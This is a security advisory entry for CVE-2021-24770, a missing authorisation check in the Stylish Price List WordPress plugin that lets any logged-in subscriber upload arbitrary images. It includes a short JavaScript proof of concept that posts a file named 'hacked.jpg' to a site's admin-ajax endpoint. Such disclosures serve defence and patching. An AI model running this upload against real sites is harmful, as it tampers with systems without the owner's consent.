Stylish Price List < 6.9.1 – Subscriber+ Arbitrary Image Upload | CVE 2021-24770 | Plugin Vulnerabilities

Description

The plugin does not perform capability checks in its spl_upload_ser_img AJAX action (available to authenticated users), which could allow any authenticated users, such as subscriber, to upload arbitrary images.

Proof of Concept

fetch("https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg").then(r=>r.blob()).then(b=>{const p = new FormData();
p.set("action","spl_upload_ser_img");
p.set("file",new File([b],"hacked.jpg",{type:"image/jpeg"}));
fetch("https://example.com/wp-admin/admin-ajax.php",{method:"POST",body:p});
})

The uploaded file will be at https://example.com/wp-content/uploads/2021/09/hacked.jpg

Affects Plugins

stylish-price-list

Fixed in 6.9.1

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4365c813-4bd7-4c7c-a15b-ef9a42d32b26

Timeline

Publicly Published

2021-09-29 (about 2 years ago)

Added

2021-09-29 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2022-11-21

Title

AntiHacker < 4.20 - Subscriber+ Arbitrary Plugin Installation

Published

2024-03-05

Title

Testimonial Slider < 2.3.7 - Author+ Settings Update

Published

2021-09-29

Title

Stylish Price List < 6.9.0 - Unauthenticated Arbitrary Image Upload

Published

2024-01-29

Title

Avada < 7.11.2 - Author+ Arbitrary File Upload via Zip Extraction

Published

2024-02-05

Title

Prime Slider – Addons For Elementor < 3.11.11 - Incorrect Authorization via bdt_duplicate_as_draft